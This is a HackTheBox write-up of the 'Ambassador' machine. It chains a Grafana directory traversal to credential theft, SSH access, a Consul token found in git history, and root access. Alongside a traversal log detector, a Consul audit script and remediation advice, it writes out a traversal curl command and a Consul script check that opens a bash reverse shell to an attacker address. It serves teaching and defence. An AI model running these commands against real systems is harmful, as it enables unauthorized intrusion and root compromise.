HTB: ambassador Writeup

Machine Information

| Attribute  | Details        |
|------------|----------------|
| Name       | ambassador     |
| OS         | Linux (Ubuntu) |
| Difficulty | Medium         |
| IP Address | 10.129.x.x     |

Machine Rating

⭐⭐⭐⭐☆ (7.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐⭐☆
  • Exploitation: ⭐⭐⭐☆☆
  • Real-world: ⭐⭐⭐⭐☆
  • Privilege Escalation: ⭐⭐⭐⭐☆

Summary

Ambassador is a Medium-difficulty Linux machine featuring multiple services with critical vulnerabilities. The exploitation path begins with discovering a Grafana instance vulnerable to directory traversal, extracting credentials and sensitive information from its SQLite database. This leads to SSH access as the developer user. Post-exploitation enumeration reveals git history containing a hardcoded Consul authentication token, which can be leveraged via the Consul API to achieve remote code execution as root.

TL;DR: Grafana CVE-2021-43798 → Extract credentials → SSH as developer → Git history reveals Consul token → Consul RCE → Root


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.x.x

Results:

| Port | Service | Version                     |
|------|---------|-----------------------------|
| 22   | SSH     | OpenSSH 8.2p1               |
| 80   | HTTP    | Apache 2.4.41 (Hugo 0.94.2) |
| 3000 | Grafana | (Authentication required)   |
| 3306 | MySQL   | 8.0.30                      |
| 8500 | Consul  | (Service discovery)         |

Service Enumeration

Key Findings:

  • Grafana running on port 3000 (redirects to /login)
  • MySQL database on port 3306
  • Consul service discovery on port 8500
  • Django application in /opt/my-app/whackywidget/

Initial Foothold

Grafana Directory Traversal (CVE-2021-43798)

Vulnerability: Grafana 8.3.0 contains a directory traversal vulnerability allowing unauthenticated arbitrary file read.

Discovery: Searchsploit identified the exploit: “Grafana 8.3.0 - Directory Traversal and Arbitrary File Read” (exploit ID: 50581.py).

# Exploit the directory traversal vulnerability
# This allows reading files outside the intended directory without authentication
python3 50581.py http://10.129.x.x:3000

Grafana Database Extraction

The exploit abuses the plugin asset path (/public/plugins/...) and can be used to extract the SQLite database (grafana.db):

# Download grafana.db via directory traversal
curl -s "http://10.129.x.x:3000/public/plugins/../../../../../../../../var/lib/grafana/grafana.db"

Database Analysis:

sqlite3 grafana.db
# Key tables: dashboard, org_user, org, data_source
# Contains: usernames, password hashes, authentication credentials, datasource credentials

The grafana.db file contains sensitive data including organization users, API tokens, and potentially cleartext credentials stored in datasource configurations.
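From the defender's side, the traversal leaves a recognisable trace: a request for a plugin asset whose path contains `..` segments. The following detector is an added example, not code from this writeup or from Grafana; it parses reverse-proxy access log lines in the common "combined" format (the sample lines are constructed, not captured from the machine), percent-decodes the path the way Grafana does before resolving the file, and reports which file each traversal resolved to and whether the server answered 200.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/nginx "combined" format. They are not taken
# from the machine, only shaped like what a reverse proxy in front of Grafana writes.
SAMPLE_ACCESS_LOG = """\
10.10.14.5 - - [08/Mar/2026:10:01:02 +0000] "GET /login HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
10.10.14.5 - - [08/Mar/2026:10:01:10 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
10.10.14.5 - - [08/Mar/2026:10:02:31 +0000] "GET /public/plugins/../../../../../../../../etc/passwd HTTP/1.1" 200 1926 "-" "curl/7.81.0"
10.10.14.5 - - [08/Mar/2026:10:02:40 +0000] "GET /public/plugins/..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar/lib/grafana/grafana.db HTTP/1.1" 200 1048576 "-" "python-requests/2.28"
10.10.14.9 - - [08/Mar/2026:10:03:00 +0000] "GET /api/health HTTP/1.1" 200 56 "-" "kube-probe/1.25"
"""

COMBINED_LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Grafana serves plugin static files below this prefix; CVE-2021-43798 lives here.
GRAFANA_STATIC_PREFIX = "/public/plugins/"


def normalise_path(raw_target: str) -> str:
    """Drop the query string and percent-decode until stable (max 3 rounds),
    because Grafana decodes the path before it resolves the plugin file."""
    path = raw_target.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_grafana_traversal(raw_target: str) -> bool:
    """True when a request under the plugin asset path carries a '..' segment."""
    path = normalise_path(raw_target)
    return path.startswith(GRAFANA_STATIC_PREFIX) and ".." in path.split("/")


def resolved_target(raw_target: str) -> str:
    """The file the traversal reaches once '..' segments are collapsed from the web root."""
    return posixpath.normpath(normalise_path(raw_target))


def find_traversal_attempts(log_text: str) -> list:
    """One finding per suspicious request; a 200 status means the read most likely succeeded."""
    findings = []
    for line in log_text.splitlines():
        m = COMBINED_LOG_RE.match(line)
        if not m or not is_grafana_traversal(m["target"]):
            continue
        findings.append({
            "src": m["src"],
            "time": m["ts"],
            "file": resolved_target(m["target"]),
            "status": int(m["status"]),
            "succeeded": m["status"] == "200",
        })
    return findings


if __name__ == "__main__":
    for f in find_traversal_attempts(SAMPLE_ACCESS_LOG):
        flag = "READ OK" if f["succeeded"] else "blocked"
        print(f'{f["time"]} {f["src"]} -> {f["file"]} [{flag}]')
```

Run it over the proxy or Grafana access log of a host that was exposed before patching; a hit on `/var/lib/grafana/grafana.db` with status 200 is the signal that every credential and datasource secret in that database should be treated as compromised and rotated, not merely that an attempt was made.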


User Compromise

SSH Access as Developer

Credential Source: credentials extracted from the Grafana database or related configuration files.

ssh developer@10.129.x.x
# Password obtained from Grafana database or related files

Post-Exploitation Enumeration

Once inside the system:

ps aux
# Reveals running processes:
# - consul agent running as root (/usr/bin/consul agent -config-dir=/)
# - mysql running
# - grafana-server
# - apache
# - sshd
# - cron
# Discover application directory
ls -la /opt/my-app/
cd /opt/my-app/whackywidget/ # Django 4.0.3 project

Git History Analysis

A critical discovery in the application git history:

cd /opt/my-app
git log --oneline
git show <commit-hash>
# or
git diff HEAD~5..HEAD

Exposed Secret: An older commit contains a hardcoded Consul authentication token used in deployment scripts:

put-config-in-consul.sh
consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD

Consul Token: bb03b43b-1d81-d62b-24b5-39540ee469b5

Django Configuration

Additional sensitive information from Django settings:

SECRET_KEY = 'django-insecure--lqw3fdyxw(28h#0(w8_te*wm*6ppl@g!ttcpo^m-ig!qtqy!l'

Privilege Escalation

Consul API Exploitation

Vulnerability: Consul's HTTP API, when called with the discovered authentication token, allows privileged operations. The Consul agent runs as root with both EnableRemoteScriptChecks and EnableLocalScriptChecks enabled, which allows remote code execution.

Verification:

curl --header "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" \
http://localhost:8500/v1/agent/self

The response shows Consul v1.13.2 with script checks enabled.

Consul Service Registration with Script Check

Consul allows registering services with health checks that execute scripts. With the valid token, we can create a malicious service registration:

curl -X PUT \
--header "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" \
-d '{
"ID": "rce-check",
"Name": "rce-service",
"Script": "/bin/bash -c \"bash -i >& /dev/tcp/10.10.x.x/PORT 0>&1\"",
"Interval": "10s"
}' \
http://localhost:8500/v1/agent/service/register

This registers a service with a script check that will execute as the root user (since the Consul agent runs as root).
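The same `/v1/agent/self` call used above for verification is what an administrator can use to audit an agent for this exact exposure. The audit below is an added example, not code from the writeup or from HashiCorp: it fetches the agent's self-report (or takes one already decoded) and flags the settings that make the script-check path dangerous. `EnableRemoteScriptChecks` and `EnableLocalScriptChecks` are the fields named on this page; the ACL-related and `HTTPAddrs` key paths inside `DebugConfig` are assumptions about the response layout (it differs between Consul releases, which is why several candidate paths are tried), and both sample responses are constructed.

```python
import json
import urllib.request

# Constructed /v1/agent/self responses. Key names under DebugConfig are assumed
# from typical agent output; verify them against your own agent before relying on this.
SAMPLE_EXPOSED = {
    "Config": {"NodeName": "ambassador", "Version": "1.13.2", "Server": True},
    "DebugConfig": {
        "ACLsEnabled": True,
        "ACLResolverSettings": {"ACLDefaultPolicy": "allow"},
        "EnableLocalScriptChecks": True,
        "EnableRemoteScriptChecks": True,
        "HTTPAddrs": ["tcp://0.0.0.0:8500"],
    },
}

SAMPLE_HARDENED = {
    "Config": {"NodeName": "consul-1", "Version": "1.13.2", "Server": True},
    "DebugConfig": {
        "ACLsEnabled": True,
        "ACLResolverSettings": {"ACLDefaultPolicy": "deny"},
        "EnableLocalScriptChecks": False,
        "EnableRemoteScriptChecks": False,
        "HTTPAddrs": ["tcp://127.0.0.1:8500"],
    },
}


def _get(d, *path, default=None):
    """Nested dict lookup that returns default instead of raising."""
    for key in path:
        if not isinstance(d, dict) or key not in d:
            return default
        d = d[key]
    return d


def _first(info, *paths, default=None):
    """Try several candidate key paths; field layout differs between Consul releases."""
    for path in paths:
        value = _get(info, *path)
        if value is not None:
            return value
    return default


def audit_agent_self(info: dict) -> list:
    """Return human-readable findings for settings that let a token holder run commands."""
    findings = []
    dbg = info.get("DebugConfig", {})
    if dbg.get("EnableRemoteScriptChecks"):
        findings.append("EnableRemoteScriptChecks=true: script checks may be registered over the "
                        "HTTP API; a token able to register services can run commands as the agent user")
    if dbg.get("EnableLocalScriptChecks"):
        findings.append("EnableLocalScriptChecks=true: script checks accepted from local config")
    acls_enabled = _first(info, ("DebugConfig", "ACLsEnabled"),
                          ("DebugConfig", "ACLResolverSettings", "ACLsEnabled"), default=False)
    if not acls_enabled:
        findings.append("ACLs disabled: every API call is anonymous and fully privileged")
    policy = _first(info, ("DebugConfig", "ACLDefaultPolicy"),
                    ("DebugConfig", "ACLResolverSettings", "ACLDefaultPolicy"), default="allow")
    if policy != "deny":
        findings.append(f"ACL default_policy={policy}: requests without a token are not rejected")
    for addr in dbg.get("HTTPAddrs") or []:
        if "0.0.0.0" in str(addr) or "[::]" in str(addr):
            findings.append(f"HTTP API bound to all interfaces ({addr}); port 8500 reachable from the network")
    return findings


def fetch_agent_self(addr: str = "http://127.0.0.1:8500", token: str = None) -> dict:
    """Query a live agent; the token goes in the X-Consul-Token header as on this page."""
    req = urllib.request.Request(f"{addr}/v1/agent/self")
    if token:
        req.add_header("X-Consul-Token", token)
    with urllib.request.urlopen(req, timeout=5) as resp:
        return json.load(resp)


if __name__ == "__main__":
    for name, sample in (("exposed", SAMPLE_EXPOSED), ("hardened", SAMPLE_HARDENED)):
        print(f"{name}: version {_get(sample, 'Config', 'Version')}")
        for finding in audit_agent_self(sample) or ["no findings"]:
            print("  -", finding)
```

Nothing in `/v1/agent/self` tells you which OS user the agent runs as, which is the other half of this privilege escalation; check that with `ps -o user= -C consul` on the host itself, and run the agent as a dedicated unprivileged user so that even an accepted script check does not land as root.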

Alternative: Consul KV Store Manipulation

With the valid token, we can also place malicious code in the KV store and reference it via application configurations or other services to achieve RCE.

Root Access Achieved

Once the script check executes or a reverse shell is established, code runs with root privileges:

id
# uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt

Attack Chain Summary

graph TD
A["Recon: Port scan<br/>22 SSH, 80 HTTP, 3000 Grafana<br/>3306 MySQL, 8500 Consul"] --> B["Grafana CVE-2021-43798<br/>Directory Traversal"]
B --> C["Extract grafana.db<br/>SQLite database"]
C --> D["Obtain credentials from<br/>database/config files"]
D --> E["SSH access as developer"]
E --> F["Enumerate processes<br/>Find Consul running as root"]
F --> G["Git history analysis<br/>Discover Consul token"]
G --> H["Consul API access<br/>bb03b43b-1d81-d62b-24b5-39540ee469b5"]
H --> I["Service registration with<br/>malicious script check"]
I --> J["Remote Code Execution<br/>as root"]

Tools Used

| Tool         | Purpose                                   |
|--------------|-------------------------------------------|
| nmap         | Port scanning and service fingerprinting  |
| searchsploit | CVE and exploit database searching        |
| curl         | HTTP requests and API interaction         |
| sqlite3      | SQLite database analysis                  |
| git log/diff | Repository history analysis               |
| ssh          | Remote access                             |
| consul       | CLI for Consul API interaction            |

Key Learnings

  1. Database Security: Default or accessible database files (like Grafana’s SQLite DB) often contain sensitive credentials and authentication tokens that shouldn’t be world-readable.

  2. Git History Secrets: Never commit sensitive credentials (API tokens, passwords, SSH keys) to git repositories. Use .gitignore and tools like git-secrets to prevent this.

  3. Service Misconfigurations: When services run as privileged users (root), any ability to interact with them (via tokens or APIs) can directly lead to privilege escalation.

  4. Consul Security: Consul tokens should be treated as secrets equivalent to passwords. Script checks should be carefully validated and only allow trusted scripts, or disabled entirely if not needed.

  5. Defense in Depth: This chain required multiple steps (CVE exploitation → database analysis → credential reuse → token discovery → API exploitation). Proper access controls at each step would have prevented compromise.


Remediation

  1. Patch Grafana: Upgrade to a patched version that addresses CVE-2021-43798.
  2. Restrict Grafana Access: Require authentication before accessing Grafana or use network-level access controls.
  3. Secure Consul Configuration:
    • Disable script checks if not required
    • Use ACLs properly and rotate tokens regularly
    • Never commit tokens to repositories
  4. Database Hardening: Restrict file permissions on SQLite databases and other sensitive data stores.
  5. Credential Management: Use secret management tools (HashiCorp Vault, AWS Secrets Manager) instead of hardcoding credentials.
  6. Git Security: Implement pre-commit hooks to prevent secret commits; audit git history for exposed secrets.

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Medium #CVE-2021-43798 #Grafana #Consul #Privilege-Escalation